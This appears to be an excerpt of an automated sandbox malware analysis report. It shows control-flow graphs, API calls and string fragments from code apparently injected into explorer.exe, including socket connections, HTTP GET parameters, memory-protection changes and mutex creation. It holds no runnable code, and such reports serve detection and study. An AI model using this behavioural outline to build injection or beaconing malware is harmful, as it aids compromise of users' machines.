a7307f4 setsockopt recv 13501->13504 13502 a730729 13502->13501 13502->13504 13503->13504 13511 a72c6b2 13503->13511 13506 a72c60a socket 13505->13506 13507 a72c5ec 13505->13507 13506->13496 13507->13506 13509 a72c76a 13508->13509 13510 a72c788 connect 13508->13510 13509->13510 13510->13503 13512 a72c705 send 13511->13512 13513 a72c6e7 13511->13513 13512->13502 13513->13512 13920 a72914a 13921 a729153 13920->13921 13926 a729174 13920->13926 13922 a72b382 ObtainUserAgentString 13921->13922 13924 a72916c 13922->13924 13923 a7291e7 13925 a7240f2 6 API calls 13924->13925 13925->13926 13926->13923 13928 a7241f2 13926->13928 13929 a72420f 13928->13929 13933 a7242c9 13928->13933 13930 a724242 13929->13930 13931 a72ef12 7 API calls 13929->13931 13932 a724289 13930->13932 13934 a725432 NtCreateFile 13930->13934 13931->13930 13932->13933 13935 a7240f2 6 API calls 13932->13935 13933->13926 13934->13932 13935->13933 13804 a730e0a 13805 a730e45 NtProtectVirtualMemory 13804->13805 13806 a72f942 13804->13806 13807 a730e70 13805->13807 13806->13805 13753 a731a4d 13754 a731a53 13753->13754 13757 a725782 13754->13757 13756 a731a6b 13758 a72578f 13757->13758 13759 a7257ad 13758->13759 13761 a72a662 13758->13761 13759->13756 13762 a72a66b 13761->13762 13770 a72a7ba 13761->13770 13763 a7240f2 6 API calls 13762->13763 13762->13770 13765 a72a6ee 13763->13765 13764 a72a750 13767 a72a83f 13764->13767 13769 a72a791 13764->13769 13764->13770 13765->13764 13766 a72ff82 6 API calls 13765->13766 13766->13764 13768 a72ff82 6 API calls 13767->13768 13767->13770 13768->13770 13769->13770 13771 a72ff82 6 API calls 13769->13771 13770->13759 13771->13770

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 a72ff82-a72ffb6 1 a72ffd6-a72ffd9 0->1 2 a72ffb8-a72ffbc 0->2 4 a7308fe-a73090c 1->4 5 a72ffdf-a72ffed 1->5 2->1 3 a72ffbe-a72ffc2 2->3 3->1 6 a72ffc4-a72ffc8 3->6 7 a72fff3-a72fff7 5->7 8 a7308f6-a7308f7 5->8 6->1 9 a72ffca-a72ffce 6->9 10 a72fff9-a72fffd 7->10 11 a72ffff-a730000 7->11 8->4 9->1 12 a72ffd0-a72ffd4 9->12 10->11 13 a73000a-a730010 10->13 11->13 12->1 12->5 14 a730012-a730020 13->14 15 a73003a-a730060 13->15 14->15 18 a730022-a730026 14->18 16 a730062-a730066 15->16 17 a730068-a73007c call a72c5b2 15->17 16->17 20 a7300a8-a7300ab 16->20 22 a730081-a7300a2 17->22 18->8 19 a73002c-a730035 18->19 19->8 23 a7300b1-a7300b8 20->23 24 a730144-a730150 20->24 22->20 26 a7308ee-a7308ef 22->26 27 a7300e2-a7300f5 23->27 28 a7300ba-a7300dc call a72f942 23->28 25 a730156-a730165 24->25 24->26 30 a730167-a730178 call a72c552 25->30 31 a73017f-a73018f 25->31 26->8 27->26 29 a7300fb-a730101 27->29 28->27 29->26 34 a730107-a730109 29->34 30->31 36 a730191-a7301ad call a72c732 31->36 37 a7301e5-a73021b 31->37 34->26 40 a73010f-a730111 34->40 47 a7301b2-a7301da 36->47 38 a73022d-a730231 37->38 39 a73021d-a73022b 37->39 44 a730233-a730245 38->44 45 a730247-a73024b 38->45 43 a73027f-a730280 39->43 40->26 46 a730117-a730132 getaddrinfo 40->46 52 a730283-a7302e0 call a730d62 call a72d482 call a72ce72 call a731002 43->52 44->43 49 a730261-a730265 45->49 50 a73024d-a73025f 45->50 46->24 51 a730134-a73013c 46->51 47->37 48 a7301dc-a7301e1 47->48 48->37 53 a730267-a73026b 49->53 54 a73026d-a730279 49->54 50->43 51->24 63 a7302e2-a7302e6 52->63 64 a7302f4-a730354 call a730d92 52->64 53->52 53->54 54->43 63->64 65 a7302e8-a7302ef call a72d042 63->65 69 a73035a-a730396 call a730d62 call a731262 call a731002 64->69 70 a73048c-a7304b8 call a730d62 call a731262 64->70 65->64 84 a7303bb-a7303e9 call a731262 * 2 69->84 85 a730398-a7303b7 call a731262 call a731002 69->85 79 a7304ba-a7304d5 70->79 80 a7304d9-a730590 call a731262 * 3 call a731002 * 2 call a72d482 70->80 79->80 109 a730595-a7305b9 call a731262 80->109 101 a730415-a73041d 84->101 102 a7303eb-a730410 call a731002 call a731262 84->102 85->84 103 a730442-a730448 101->103 104 a73041f-a730425 101->104 102->101 103->109 110 a73044e-a730456 103->110 107 a730467-a730487 call a731262 104->107 108 a730427-a73043d 104->108 107->109 108->109 120 a7305d1-a7306ad call a731262 * 7 call a731002 call a730d62 call a731002 call a72ce72 call a72d042 109->120 121 a7305bb-a7305cc call a731262 call a731002 109->121 110->109 113 a73045c-a73045d 110->113 113->107 132 a7306af-a7306b3 120->132 121->132 134 a7306b5-a7306fa call a72c382 call a72c7b2 132->134 135 a7306ff-a73072d call a72c6b2 132->135 153 a7308e6-a7308e7 134->153 144 a73072f-a730735 135->144 145 a73075d-a730761 135->145 144->145 149 a730737-a73074c 144->149 150 a730767-a73076b 145->150 151 a73090d-a730913 145->151 149->145 154 a73074e-a730754 149->154 157 a730771-a730773 150->157 158 a7308aa-a7308df call a72c7b2 150->158 155 a730779-a730784 151->155 156 a730919-a730920 151->156 153->26 154->145 163 a730756 154->163 159 a730786-a730793 155->159 160 a730795-a730796 155->160 156->159 157->155 157->158 158->153 159->160 164 a73079c-a7307a0 159->164 160->164 163->145 167 a7307a2-a7307af 164->167 168 a7307b1-a7307b2 164->168 167->168 170 a7307b8-a7307c4 167->170 168->170 173 a7307c6-a7307ef call a730d92 call a730d62 170->173 174 a7307f4-a730861 setsockopt recv 170->174 173->174 177 a7308a3-a7308a4 174->177 178 a730863 174->178 177->158 178->177 181 a730865-a73086a 178->181 181->177 184 a73086c-a730872 181->184 184->177 186 a730874-a7308a1 184->186 186->177 186->178
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: getaddrinforecvsetsockopt
                                                                                                                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                      • API String ID: 1564272048-1117930895
                                                                                                                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                      • Instruction ID: 3068cd3854f2de2c7be95f8e38ebd24ffa338a0adaa1a7038e997f4ed44af4e1
                                                                                                                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                      • Instruction Fuzzy Hash: DE529131614A088FDB69EF68C4887E9B7E1FB58300F51862EC49FC7147DE74A54ACB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 299 a72f232-a72f256 300 a72f25c-a72f260 299->300 301 a72f8bd-a72f8cd 299->301 300->301 302 a72f266-a72f2a0 300->302 303 a72f2a2-a72f2a6 302->303 304 a72f2bf 302->304 303->304 306 a72f2a8-a72f2ac 303->306 305 a72f2c6 304->305 309 a72f2cb-a72f2cf 305->309 307 a72f2b4-a72f2b8 306->307 308 a72f2ae-a72f2b2 306->308 307->309 310 a72f2ba-a72f2bd 307->310 308->305 311 a72f2d1-a72f2f7 call a72f942 309->311 312 a72f2f9-a72f30b 309->312 310->309 311->312 316 a72f378 311->316 312->316 317 a72f30d-a72f332 312->317 318 a72f37a-a72f3a0 316->318 319 a72f3a1-a72f3a8 317->319 320 a72f334-a72f33b 317->320 321 a72f3d5-a72f3dc 319->321 322 a72f3aa-a72f3d3 call a72f942 319->322 323 a72f366-a72f370 320->323 324 a72f33d-a72f360 call a72f942 320->324 327 a72f410-a72f458 NtCreateFile call a72f172 321->327 328 a72f3de-a72f40a call a72f942 321->328 322->316 322->321 323->316 325 a72f372-a72f373 323->325 324->323 325->316 334 a72f45d-a72f45f 327->334 328->316 328->327 334->316 336 a72f465-a72f46d 334->336 336->316 337 a72f473-a72f476 336->337 338 a72f486-a72f48d 337->338 339 a72f478-a72f481 337->339 340 a72f4c2-a72f4ec 338->340 341 a72f48f-a72f4b8 call a72f942 338->341 339->318 347 a72f4f2-a72f4f5 340->347 348 a72f8ae-a72f8b8 340->348 341->316 346 a72f4be-a72f4bf 341->346 346->340 349 a72f604-a72f611 347->349 350 a72f4fb-a72f4fe 347->350 348->316 349->318 351 a72f500-a72f507 350->351 352 a72f55e-a72f561 350->352 355 a72f538-a72f559 351->355 356 a72f509-a72f532 call a72f942 351->356 357 a72f616-a72f619 352->357 358 a72f567-a72f572 352->358 362 a72f5e9-a72f5fa 355->362 356->316 356->355 360 a72f6b8-a72f6bb 357->360 361 a72f61f-a72f626 357->361 363 a72f5a3-a72f5a6 358->363 364 a72f574-a72f59d call a72f942 358->364 365 a72f739-a72f73c 360->365 366 a72f6bd-a72f6c4 360->366 368 a72f657-a72f66b call a730e92 361->368 369 a72f628-a72f651 call a72f942 361->369 362->349 363->316 371 a72f5ac-a72f5b6 363->371 364->316 364->363 375 a72f742-a72f749 365->375 376 a72f7c4-a72f7c7 365->376 372 a72f6c6-a72f6ef call a72f942 366->372 373 a72f6f5-a72f734 366->373 368->316 391 a72f671-a72f6b3 368->391 369->316 369->368 371->316 379 a72f5bc-a72f5e6 371->379 372->348 372->373 395 a72f894-a72f8a9 373->395 383 a72f77a-a72f7bf 375->383 384 a72f74b-a72f774 call a72f942 375->384 376->316 380 a72f7cd-a72f7d4 376->380 379->362 386 a72f7d6-a72f7f6 call a72f942 380->386 387 a72f7fc-a72f803 380->387 383->395 384->348 384->383 386->387 393 a72f805-a72f825 call a72f942 387->393 394 a72f82b-a72f835 387->394 391->318 393->394 394->348 400 a72f837-a72f83e 394->400 395->318 400->348 404 a72f840-a72f886 400->404 404->395
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID: `
                                                                                                                                      • API String ID: 823142352-2679148245
                                                                                                                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                      • Instruction ID: bb343b66b48531aef1b96d35b3bdcec04a22a72f62d3f3cef0c7c3db31a280ec
                                                                                                                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                      • Instruction Fuzzy Hash: 79224C70A18A199FDB99EF28C4986AEF7F1FB58301F51822ED45ED3250DB30A465CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 443 a730e12-a730e6e call a72f942 NtProtectVirtualMemory 446 a730e70-a730e7c 443->446 447 a730e7d-a730e8f 443->447
                                                                                                                                      APIs
                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 0A730E67
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                      • Instruction ID: a559d901b6f3cee472db6d7dd012d5f37e398d0e73c86ae1296185f10fcce587
                                                                                                                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                      • Instruction Fuzzy Hash: 2201B130668B484F9B88EF6CE48422AB7E4FBDD315F000B3EE99AC3250EB70C5414742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 448 a730e0a-a730e38 449 a730e45-a730e6e NtProtectVirtualMemory 448->449 450 a730e40 call a72f942 448->450 451 a730e70-a730e7c 449->451 452 a730e7d-a730e8f 449->452 450->449
                                                                                                                                      APIs
                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 0A730E67
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                      • Instruction ID: 00ca401b344a9ac445e831b20723b8d4fdb8398f84324cc7abe5e7a209d3cc32
                                                                                                                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                      • Instruction Fuzzy Hash: 5401A234668B884B8B88EF6C94452A6B3E5FBCE314F004B3EE9DAC3241DB21D5024782
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • ObtainUserAgentString.URLMON ref: 0A72A9A0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AgentObtainStringUser
                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                      • API String ID: 2681117516-319646191
                                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                      • Instruction ID: cd23e7ee04291b5925d0379f39d5c7969f2bd785e761292c6cc06bf1024e4b76
                                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                      • Instruction Fuzzy Hash: AC31D431614A5C8BCF44EFA8C8487EDB7E0FB58205F41422AD44ED7241DE788649C785
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • ObtainUserAgentString.URLMON ref: 0A72A9A0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AgentObtainStringUser
                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                      • API String ID: 2681117516-319646191
                                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                      • Instruction ID: 90f7ef1942dd089aac22b005bf834c42d2907264976fee92a290d0f651d024b7
                                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                      • Instruction Fuzzy Hash: 2421E631610A5C8BCF04EFA9C8487EDBBE0FF58205F41822AD45AD7242DF748609CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 232 a726b66-a726b68 233 a726b93-a726bb8 232->233 234 a726b6a-a726b71 232->234 236 a726bbb-a726c22 call a72d612 call a72f942 * 2 233->236 234->236 237 a726b73-a726b92 234->237 244 a726c28-a726c2b 236->244 245 a726cdc 236->245 237->233 244->245 247 a726c31-a726cd3 call a731da4 call a731022 call a7313e2 call a731022 call a7313e2 CreateMutexW 244->247 246 a726cde-a726cf6 245->246 247->245 261 a726cd5-a726cda 247->261 261->246
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateMutex
                                                                                                                                      • String ID: .dll$el32$kern
                                                                                                                                      • API String ID: 1964310414-1222553051
                                                                                                                                      • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                      • Instruction ID: 64f32a4df89572eca90c0b4ece9ed9a6985906009540a1ab5266605bd46ff9dc
                                                                                                                                      • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                      • Instruction Fuzzy Hash: 85415E71918A1C8FDB54EFA8C8987AD77E0FB58300F45827AC84ADB256DE309949CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateMutex
                                                                                                                                      • String ID: .dll$el32$kern
                                                                                                                                      • API String ID: 1964310414-1222553051
                                                                                                                                      • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                      • Instruction ID: a0cbcddd815d098718909e427faf0b28f1ed5d4f7ed5b28d50f267ee8dba90e7
                                                                                                                                      • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                      • Instruction Fuzzy Hash: 2B413C71918A1C8FDF94EFA8C4987AD77F0FB68300F45816AC84EDB256DE309945CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 289 a72c72e-a72c768 290 a72c76a-a72c782 call a72f942 289->290 291 a72c788-a72c7ab connect 289->291 290->291
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: connect
                                                                                                                                      • String ID: conn$ect
                                                                                                                                      • API String ID: 1959786783-716201944
                                                                                                                                      • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                      • Instruction ID: 34539af6883c594779d8bb33e820483d820ec4d86cfb5f702540aa678f9b9e07
                                                                                                                                      • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                      • Instruction Fuzzy Hash: C9015E30618B188FCB84EF1CE088B55B7E0FB68314F1545AED90DCB226C774C8858BC2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 294 a72c732-a72c768 295 a72c76a-a72c782 call a72f942 294->295 296 a72c788-a72c7ab connect 294->296 295->296
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: connect
                                                                                                                                      • String ID: conn$ect
                                                                                                                                      • API String ID: 1959786783-716201944
                                                                                                                                      • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                      • Instruction ID: 11945de087c0ab692108b7a4185e64feaa910e94e742a56a3e59da28ad1a082f
                                                                                                                                      • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                      • Instruction Fuzzy Hash: 81012C70618A1C8FCB84EF5CE088B55BBE0FB59315F1541AEE90DCB226CB74C9858BC2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 407 a72c6b2-a72c6e5 408 a72c6e7-a72c6ff call a72f942 407->408 409 a72c705-a72c72d send 407->409 408->409
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: send
                                                                                                                                      • String ID: send
                                                                                                                                      • API String ID: 2809346765-2809346765
                                                                                                                                      • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                      • Instruction ID: d2c5ac7b242658e2e0316b1874f8e7b0f740389192642cfcdf3b41b51671881b
                                                                                                                                      • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                      • Instruction Fuzzy Hash: AE015270518A188FDBC4EF1CD048B2577E0EB58314F1541AED85DCB266C670D8818B81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 412 a72c5b2-a72c5ea 413 a72c60a-a72c62b socket 412->413 414 a72c5ec-a72c604 call a72f942 412->414 414->413
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: socket
                                                                                                                                      • String ID: sock
                                                                                                                                      • API String ID: 98920635-2415254727
                                                                                                                                      • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                      • Instruction ID: af7b3689e204ee3ce41a341668a62aa02c23545821e99b70429208c2a66f6165
                                                                                                                                      • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                      • Instruction Fuzzy Hash: 8401447061861C8FCB84EF1CD048B54BBE0FB59314F1545ADD45EDB266C7B0C985CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 417 a7242dd-a724320 call a72f942 420 a724326 417->420 421 a7243fa-a72440e 417->421 422 a724328-a724339 SleepEx 420->422 422->422 423 a72433b-a724341 422->423 424 a724343-a724349 423->424 425 a72434b-a724352 423->425 424->425 426 a72435c-a72436a call a72ef12 424->426 427 a724370-a724376 425->427 428 a724354-a72435a 425->428 426->427 429 a7243b7-a7243bd 427->429 430 a724378-a72437e 427->430 428->426 428->427 433 a7243d4-a7243db 429->433 434 a7243bf-a7243cf call a724e72 429->434 430->429 432 a724380-a72438a 430->432 432->429 436 a72438c-a7243b1 call a725432 432->436 433->422 438 a7243e1-a7243f5 call a7240f2 433->438 434->433 436->429 438->422
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                      • Instruction ID: da11ae4ce8253a999253ae46ebcf1ea4b0cad7f6989240f08d57b7d1cf703a99
                                                                                                                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                      • Instruction Fuzzy Hash: D9316B74624B19DFEB68EF2980882E5BBA4FB54301F45827EC92DDA107CB349468CF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 453 a724412-a724446 call a72f942 456 a724473-a72447d 453->456 457 a724448-a724472 call a731c9e CreateThread 453->457
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_a680000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                      • Instruction ID: 2792f608f5931d38b0f9c61a17287c9d2f658edd2396bd783aab39cce7181e88
                                                                                                                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                      • Instruction Fuzzy Hash: 67F0FC30268A484FD784EF2CD44563AF3D0FBE8215F45463ED54DC3255DA75C5814715
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                      • API String ID: 0-393284711
                                                                                                                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                      • Instruction ID: 99383c5b42c7e37f610a33ed8ca2d4e33a16aac55849494d945786497793bde6
                                                                                                                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                      • Instruction Fuzzy Hash: 54E17974628F498FD764DF68C4847AAB7E1FB58304F408A2E95AFC7241DF30A545CB8A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_11850000_explorer.jbxd
